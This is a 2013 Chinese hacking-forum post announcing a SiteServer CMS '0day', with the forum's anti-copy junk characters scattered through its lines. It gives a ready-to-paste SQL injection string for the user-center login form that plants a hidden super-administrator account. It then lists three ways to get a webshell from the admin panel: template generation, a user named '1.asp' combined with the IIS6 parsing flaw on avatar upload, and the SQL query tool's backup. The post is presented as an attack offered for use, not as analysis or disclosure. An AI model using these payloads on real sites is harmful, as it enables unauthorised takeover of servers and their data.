找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2449|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
$ I8 |  e& R3 A# `! _7 \5 r) P7 \/ z( ?+ Q; ~) S1 _
stieserver官网:www.siteserver.cn
, Z0 v5 k3 _7 C" _& W% _" ~6 f1 t; k1 P2 }' r

3 J$ I; t1 K* I
8 N9 l. Q! F6 i$ }+ d% j; O: O7 JEXP:
# n& L' `) s: _  Q& }/ ^* p
% X8 V7 y+ r5 R/ y, c/ p直接访问UserCenter/login.aspx
7 u" f' B/ u2 @# v" E' s
# ~5 j( Q/ s& D! r( m ' r; P1 x6 I, y4 c) n5 F9 ~

4 z, b2 Y/ I8 j6 K$ P6 ?) J4 b3 V用户名处输入:; k3 M: y' T0 v; @8 n

! ?% N9 ]0 j# Q1 s123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
; F1 ]$ g1 y- u$ U! w4 ]; Z( u7 {+ g& p' z4 u% P% k" T/ \$ p# H
7 R0 o* J' E2 h& I# q$ v- l7 l

9 Y) D. L3 W  U  \1 ^: f密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。4 B, O' U% b6 L" p1 Q
, E5 p, Y! B! b. g( \

, `- ]4 P3 R" b+ ]) ?0 w# W
2 E' @+ U! J* Z% S4 j% l之后再访问后台SiteServer/login.aspx用插入的用户登陆) A( N+ o. H  B! P! F( @
$ F$ R5 y0 _* s4 ?6 K
+ y7 R3 W& i; r/ ]$ `8 @( m

+ m+ a) H& l) p8 L0 K后台拿webshell的三种方法:! b1 v. D+ Q6 a( ~  g; P

% [- f- |7 j! H! L) Y一、
; u. G1 G9 V3 A$ M4 A* q7 y1 i- r( y1 ?0 I# \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" t" C; U- g# I  ~) P; g2 K  K5 v4 q' ]& W0 R- M6 o5 |3 _# \
二、
7 f& N. n+ `% Q+ E: ~7 K& \
* `: G3 d, [) j0 z9 h成员权限-》添加用户-》用户名为:1.asp
, e( A# F  r, z1 D  V. p4 |$ f2 m* Z( I9 `0 M" e+ q
http://127.0.0.1/usercenter/: \( P1 F2 T. o- s/ g
0 A1 d& r$ j! o) r5 o
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" A6 g) k/ V4 C8 X% H3 h! h: O/ Q: f6 B' {8 e
(ps:后台添加用户时不会验证是否含有非法字符)8 K9 j, ]6 }$ c- U
7 |  Q0 i7 F! A$ u. R, \! @
三、
+ e2 w- w4 \# e1 n6 C
2 p: d. R1 ^, q# [系统工具-》实用工具-》机器参数查看$ V& Q' P) p. {8 P' m( F: a
可以看到数据库类型、名称,WEB路径
9 K' ~. O. [( A
: C7 X4 ^- j' P+ D2 D系统工具-》数据库工具-》SQL语句查询5 ]6 P8 U3 t  x" W( x4 C/ C
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。1 ^0 v0 F. L. P* t( W* Z1 R
. ]2 f0 p7 z4 w2 g# R/ t9 g# V! @! M/ H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表